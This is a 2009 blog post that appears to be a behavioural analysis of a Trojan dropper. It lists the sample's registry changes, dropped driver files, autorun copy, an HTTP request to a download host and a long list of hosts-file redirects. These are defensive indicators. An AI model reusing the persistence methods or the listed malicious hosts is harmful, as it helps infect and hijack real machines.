Aug 7, 2009
Malware Analysis: Antivirus System PRO
This summary is not available. Please
click here to view the post.
Jun 10, 2009
Malware Analysis: Trojan.Dropper
I have receive a suspicious file from my colleague yesterday and done a simple behaviour analysis on it. It seems to be a relatively new virus as major AV tools (such as McAfee, TrendMicro, Kaspersky, F-secure..) were not able to detect it.
Analysis Report:
##############
File: 1.exe
Size: 1033728
MD5: 19AB525B9AF6CBB40F428115E8148522
Virus Found: Trojan.Dropper (Symantec), Win32/Heur (AVG), TR/Crypt.FKM.Gen (AntiVir), Mal/EncPk-EE (Sophos)
On the VirusTotal website, only 20 out of 40 AV detected it (details).
Summary:
=======
The Trojan will modify the PCIDump service, add several .sys files such as acpiec.sys into your C:\Windows\system32 folder. It will also copy itself and add a autorun.inf to C:\. It will also copy phpi.dll into C:\Windows folder.
It changes the Hosts file and try to connect to www.cvbasefwdase.cn via HTTP to download other files. Likely to be trying to download more malicious payload.
Techincal Details:
################
Registry keys added:
==============
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control
HKLM\SYSTEM\ControlSet001\Services\pcidump
HKLM\SYSTEM\ControlSet001\Services\pcidump\Security
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Security
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control
HKLM\SYSTEM\CurrentControlSet\Services\pcidump
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Security
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Security
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell
Registry keys deleted:
==============
HKLM\SYSTEM\ControlSet001\Services\PCIDump
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump
Registry values added:
===============
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG\Trace Level: ""
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72 73 5C 4F 4C 44 35 2E 74 6D 70 00 00 00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control\ActiveService: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Service: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\DeviceDesc: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control\ActiveService: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Service: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\DeviceDesc: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\0: "Root\LEGACY_PCIDUMP\0000"
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\ControlSet001\Services\pcidump\Type: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Start: 0x00000003
HKLM\SYSTEM\ControlSet001\Services\pcidump\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\pcidump\ImagePath: "System32\DRIVERS\pcidump.sys"
HKLM\SYSTEM\ControlSet001\Services\pcidump\DisplayName: "pcidump"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\0: "Root\LEGACY_UPDATEDATA\0000"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Type: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Start: 0x00000003
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\ImagePath: "\??\C:\WINDOWS\system32\drivers\acpiec.sys"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\DisplayName: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72 73 5C 4F 4C 44 35 2E 74 6D 70 00 00 00
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control\ActiveService: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Service: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\DeviceDesc: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control\ActiveService: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Service: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\DeviceDesc: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\0: "Root\LEGACY_PCIDUMP\0000"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Start: 0x00000003
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\ImagePath: "System32\DRIVERS\pcidump.sys"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\DisplayName: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\0: "Root\LEGACY_UPDATEDATA\0000"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Start: 0x00000003
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\ImagePath: "\??\C:\WINDOWS\system32\drivers\acpiec.sys"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\DisplayName: "UPDATEDATA"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\1.rkr: 09 00 00 00 06 00 00 00 F0 8C 78 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\FolderType: "MyDocuments"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@shell32.dll,-12691: "My Recent Documents"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\1.exe: "Microsoft ???????"
Registry values deleted:
================
HKLM\SYSTEM\ControlSet001\Services\PCIDump\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Group: "PCI Configuration"
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Start: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Tag: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Group: "PCI Configuration"
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Start: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Tag: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Type: 0x00000001
Registry values modified:
=================
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: C9 5A 15 C4 25 28 78 C3 EA 94 2F FD E9 49 6F 86 00 EA EC 29 33 E7 A4 37 AE D9 53 A6 3F 7C 0F 9B 7C B4 0C C8 B7 B8 C6 6C 07 CD 75 47 55 88 CC E0 E4 31 36 49 C8 36 EC C6 A7 CD 6C 87 BB 2A 41 42 B9 55 42 B9 53 0C FE 7F 17 BA 4B E4 32 E0 33 4D
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 72 0B C5 74 CD 96 F6 DF 3D 2D 96 32 0A 0B CE ED 24 AA AA E6 4B 52 CE B7 C5 99 30 82 1D 4B 31 65 A0 C0 4F 8B B2 E5 FE 0B BE EF A8 61 B8 FD 4B 5C C6 59 F8 9B 2E E8 7C B8 AF 3C EE 3E 34 74 23 78 5D DC 0E E7 05 99 3D D5 4B A3 48 5B 66 6C 8E 38
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000006
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000014
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000002
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000A
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\EventMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\EventMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\EventMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\EventMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\CategoryMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\CategoryMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 09 00 00 00 61 00 00 00 A0 22 D9 17 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 09 00 00 00 62 00 00 00 20 EB 67 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 09 00 00 00 9E 00 00 00 40 D7 FC 17 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 09 00 00 00 9F 00 00 00 F0 8C 78 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 46 00 00 00 31 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 B0 A8 11 EE B6 52 C9 01 01 00 00 00 C0 A8 EC 80 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 46 00 00 00 32 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 B0 A8 11 EE B6 52 C9 01 01 00 00 00 C0 A8 EC 80 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 01 00 00 00 03 00 00 00 07 00 00 00 05 00 00 00 06 00 00 00 04 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 05 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 07 00 00 00 06 00 00 00 04 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\Windowplacement: 2C 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF CE 00 00 00 24 00 00 00 26 03 00 00 18 02 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\Windowplacement: 2C 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF E6 00 00 00 37 00 00 00 3E 03 00 00 2B 02 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\SymbolWarningShown: 0x00000000
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\SymbolWarningShown: 0x00000001
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\DefaultProcPropPage: 0x00000000
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\DefaultProcPropPage: 0x00000006
Files added:
========
C:\WINDOWS\system32\CatRoot2\tmp.edb
C:\WINDOWS\system32\dllcache\acpiec.sys
C:\WINDOWS\system32\drivers\OLD5.tmp
C:\WINDOWS\system32\drivers\pcidump.sys
C:\WINDOWS\system32\func.dll
C:\WINDOWS\LastGood\system32\drivers\acpiec.sys
C:\WINDOWS\phpi.dll
C:\1.exe
C:\autorun.inf
Files modified:
==========
C:\Documents and Settings\Owner\Cookies\index.dat
C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat
C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat
C:\Documents and Settings\Owner\ntuser.dat.LOG
C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf
C:\WINDOWS\setupapi.log
C:\WINDOWS\system32\CatRoot2\edb.chk
C:\WINDOWS\system32\CatRoot2\edb.log
C:\WINDOWS\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\software.LOG
C:\WINDOWS\system32\config\system.LOG
C:\WINDOWS\system32\drivers\acpiec.sys
C:\WINDOWS\system32\drivers\etc\hosts
Folder added:
=========
C:\WINDOWS\LastGood
C:\WINDOWS\LastGood\system32
C:\WINDOWS\LastGood\system32\drivers
Other behaviours:
============
>System connecting to www.cvbasefwdase.cn:80
The following HTTP request found:
Get /new.txt HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.cvbasefwdase.cn
Connection: Keep-Alive
>System listening on UDP as va9sdhun23.cn:1030
>Running "rundll32.exe" as a process
>Change the hosts file with the following entries:
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.0.0.3 adlaji.cn
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
